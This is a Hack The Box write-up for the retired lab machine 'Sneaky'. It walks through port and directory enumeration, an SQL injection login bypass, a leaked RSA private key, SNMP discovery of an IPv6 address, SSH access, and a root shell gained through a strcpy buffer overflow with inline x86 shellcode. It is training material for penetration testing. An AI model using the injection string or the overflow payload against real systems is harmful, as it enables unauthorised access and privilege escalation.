HTB – Sneaky

Today we are going to solve another CTF challenge “Sneaky” which is available online for those who want to increase their skill in penetration testing and black box testing. Sneaky is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

let’s begin with nmap port enumeration.

root@kali:~/htb/sneaky# nmap -sT -sU -p 161,80 10.10.10.20
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 10:56 CET
Stats: 0:00:15 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 10.10.10.20
Host is up (0.026s latency).

PORT    STATE  SERVICE
80/tcp  open   http
161/tcp closed snmp
80/udp  closed http
161/udp open   snmp

Nmap done: 1 IP address (1 host up) scanned in 16.83 seconds

As port 80 is running http we open it in our browser, the website shows that it’s under construction.

We initiate dirb to enumerate the directories hosted on the target machine.

root@kali:~/htb/sneaky# dirb http://10.10.10.20/
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Mon Dec 24 11:37:09 2018
URL_BASE: http://10.10.10.20/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.20/ ----
==> DIRECTORY: http://10.10.10.20/dev/

We find a directory called /dev/ we open it in our browser and find a login screen.

We find the login page is vulnerable to sql injection; we use this vulnerability to bypass the login page using query ‘ or 1=1;– in username and password.

After logging in we find a link on the webpage.

We open the link and find a RSA private key. We download the key into our system.

http://10.10.10.20/dev/sshkeyforadministratordifficulttimes

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAvQxBD5yRBGemrZI9F0O13j15wy9Ou8Z5Um2bC0lMdV9ckyU5
Lc4V+rY81lS4cWUx/EsnPrUyECJTtVXG1vayffJISugpon49LLqABZbyQzc4GgBr
3mi0MyfiGRh/Xr4L0+SwYdylkuX72E7rLkkigSt4s/zXp5dJmL2RBZDJf1Qh6Ugb
yDxG2ER49/wbdet8BKZ9EG7krGHgta4mfqrBbZiSBG1ST61VFC+G6v6GJQjC02cn
cb+zfPcTvcP0t63kdEreQbdASYK6/e7Iih/5eBy3i8YoNJd6Wr8/qVtmB+FuxcFj
oOqS9z0+G2keBfFlQzHttLr3mh70tgSA0fMKMwIDAQABAoIBAA23XOUYFAGAz7wa
Nyp/9CsaxMHfpdPD87uCTlSETfLaJ2pZsgtbv4aAQGvAm91GXVkTztYi6W34P6CR
h6rDHXI76PjeXV73z9J1+aHuMMelswFX9Huflyt7AlGV0G/8U/lcx1tiWfUNkLdC
CphCICnFEK3mc3Mqa+GUJ3iC58vAHAVUPIX/cUcblPDdOmxvazpnP4PW1rEpW8cT
OtsoA6quuPRn9O4vxDlaCdMYXfycNg6Uso0stD55tVTHcOz5MXIHh2rRKpl4817a
I0wXr9nY7hr+ZzrN0xy5beZRqEIdaDnQG6qBJFeAOi2d7RSnSU6qH08wOPQnsmcB
JkQxeUkCgYEA3RBR/0MJErfUb0+vJgBCwhfjd0x094mfmovecplIUoiP9Aqh77iz
5Kn4ABSCsfmiYf6kN8hhOzPAieARf5wbYhdjC0cxph7nI8P3Y6P9SrY3iFzQcpHY
ChzLrzkvV4wO+THz+QVLgmX3Yp1lmBYOSFwIirt/MmoSaASbqpwhPSUCgYEA2uym
+jZ9l84gdmLk7Z4LznJcvA54GBk6ESnPmUd8BArcYbla5jdSCNL4vfX3+ZaUsmgu
7Z9lLVVv1SjCdpfFM79SqyxzwmclXuwknC2iHtHKDW5aiUMTG3io23K58VDS0VwC
GR4wYcZF0iH/t4tn02qqOPaRGJAB3BD/B8bRxncCgYBI7hpvITl8EGOoOVyqJ8ne
aK0lbXblN2UNQnmnywP+HomHVH6qLIBEvwJPXHTlrFqzA6Q/tv7E3kT195MuS10J
VnfZf6pUiLtupDcYi0CEBmt5tE0cjxr78xYLf80rj8xcz+sSS3nm0ib0RMMAkr4x
hxNWWZcUFcRuxp5ogcvBdQKBgQDB/AYtGhGJbO1Y2WJOpseBY9aGEDAb8maAhNLd
1/iswE7tDMfdzFEVXpNoB0Z2UxZpS2WhyqZlWBoi/93oJa1on/QJlvbv4GO9y3LZ
LJpFwtDNu+XfUJ7irbS51tuqV1qmhmeZiCWIzZ5ahyPGqHEUZaR1mw2QfTIYpLrG
UkbZGwKBgGMjAQBfLX0tpRCPyDNaLebFEmw4yIhB78ElGv6U1oY5qRE04kjHm1k/
Hu+up36u92YlaT7Yk+fsk/k+IvCPum99pF3QR5SGIkZGIxczy7luxyxqDy3UfG31
rOgybvKIVYntsE6raXfnYsEcvfbaE0BsREpcOGYpsE+i7xCRqdLb
-----END RSA PRIVATE KEY-----

Now the target machine is not running any ssh service so that we can use this to login through ssh.

To investigate further we enumerate SNMP protocol to gain more information.

root@kali:~/htb/sneaky# snmpwalk -v2c -c public 10.10.10.20
iso.3.6.1.2.1.1.1.0 = STRING: "Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (3570073) 9:55:00.73
iso.3.6.1.2.1.1.4.0 = STRING: "root"
iso.3.6.1.2.1.1.5.0 = STRING: "Sneaky"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
root@kali:~/htb/sneaky# python enyx.py 2c public 10.10.10.20
#######################################################################
[+] Snmpwalk found.
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:fe8f:6bf0
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:fe8f:6bf0

or

root@kali:~/htb/sneaky# apt install snmp-mibs-downloader
root@kali:~/htb/sneaky# vi /etc/snmp/snmp.conf
# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
# mibs :
root@kali:~/htb/sneaky# snmpwalk -v2c -c public 10.10.10.20 > snmpwalk.txt

root@kali:~/htb/sneaky# cat snmpwalk.txt | grep ipv6
IP-MIB::ipAddressPrefix.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:8f:6b:f0" = OID: IP-MIB::ipAddressPrefixOrigin.2.ipv6."de:ad:be:ef:00:00:00:00:00:00:00:00:00:00:00:00".64

After finding the ipv6 address of the target machine we login through ssh using the username and RSA Private key that we find after we login on the /dev/ page.

root@kali:~/htb/sneaky# ssh -i priv -6 thrasivoulos@dead:beef:0000:0000:0250:56ff:fe8f:6bf0
The authenticity of host 'dead:beef::250:56ff:fe8f:6bf0 (dead:beef::250:56ff:fe8f:6bf0)' can't be established.
ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'dead:beef::250:56ff:fe8f:6bf0' (ECDSA) to the list of known hosts.
lsWelcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Dec 24 04:46:18 EET 2018

System load: 0.0 Memory usage: 4% Processes: 177
Usage of /: 9.9% of 18.58GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077
lsthrasivoulos@Sneaky:~$ ls

After logging in through ssh we find a file called user.txt we open it and find our first flag. Now we try to find files with suid bit set.

thrasivoulos@Sneaky:~$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/ping6
/bin/fusermount
/bin/ping
/usr/local/bin/chal
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/at
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
thrasivoulos@Sneaky:~$
  • After enumerating the executable file, we understand it is an elf executable file 32 bit and it uses strcpy().
  • Function strcpy() is vulnerable to Buffer Overflow
  • After running gdb and understanding memory allocations, following code will successfully run shell with root user.
  • The shell code used is
thrasivoulos@Sneaky:/usr/local/bin$ ./chal $(python -c 'print "\x90"*330 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x42\xf4\xff\xbf"*30')
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
# whoami
root
# cd /
# cd root
# cat root.txt
c515*****b33

 

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *